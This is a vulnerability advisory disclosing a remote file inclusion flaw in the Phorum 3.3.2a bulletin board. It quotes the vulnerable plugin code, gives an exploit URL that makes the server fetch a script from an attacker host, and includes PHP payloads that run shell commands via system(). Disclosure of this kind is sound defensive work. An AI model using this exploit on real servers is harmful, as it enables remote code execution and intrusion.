Target: Phorum 3.3.2a (prior versions?) Description: In Phorum 3.3.2a (a bulletin board) there's a security flaw that lets remote users include external php scripts and execute arbitary code. Found by: Markus Arndt<markus-arndt@web.de> Vendor: http://www.phorum.org Notified Vendor: Yes, already fixed version available Details: After extracting the Phorum 3.3.2a archive we have lots of php files and subfolders. I just snooped around a bit and found this file vulnerable for remote script inclusion: ./plugin/replace/plugin.php let's see some code: <?php include("$PHORUM[settings_dir]/replace.php"); function mod_replace_read_body ($body) { global $pluginreplace; reset($pluginreplace); while(list($key,$val) = each($pluginreplace)) { $body = str_replace($key,$val,$body); } return $body; } $plugins["read_body"]["mod_replace"]="mod_replace_read_body"; ?> Easy one.. http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls This one will get the file http://[evilhost]/replace.php and execute it. If [evilhost] has php enabled we could use this one as replace.php: <? echo("<? system(\"\$cmd\"); ?>"); ?> If it's not php-enabled simply: <? system("$cmd"); ?> Markus Arndt<markus-arndt@web.de> http://skka.de ________________________________________________________________ Keine verlorenen Lotto-Quittungen, keine vergessenen Gewinne mehr! Beim WEB.DE Lottoservice: http://tippen2.web.de/?x=13
